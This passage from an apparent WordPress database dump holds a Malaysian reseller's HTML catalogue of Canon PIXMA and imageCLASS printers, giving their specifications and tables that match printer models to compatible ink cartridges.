width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 11:04:21','2019-09-25 03:04:21','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3333,1,'2019-09-25 10:23:44','2019-09-25 02:23:44','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<table border=\"1\" width=\"378\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n<td>Maintenance Cartridge MC-20</td>\n</tr>\n<tr>\n<td>PFI-50 (Blue)</td>\n</tr>\n<tr>\n<td>PFI-50 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td>PFI-50 (Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Matte Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Red)</td>\n</tr>\n<tr>\n<td>PFI-50 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E4270</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E470</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E477</td>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E480</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E510</td>\n<td>CL-98 (Colour)</td>\n</tr>\n<tr>\n<td>PG-88 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G2010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G4010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP100</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA iP1300</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA iP4200</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"10\" align=\"center\">PIXMA iP7270</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"12\" align=\"center\">PIXMA iP8770</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Gray)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL 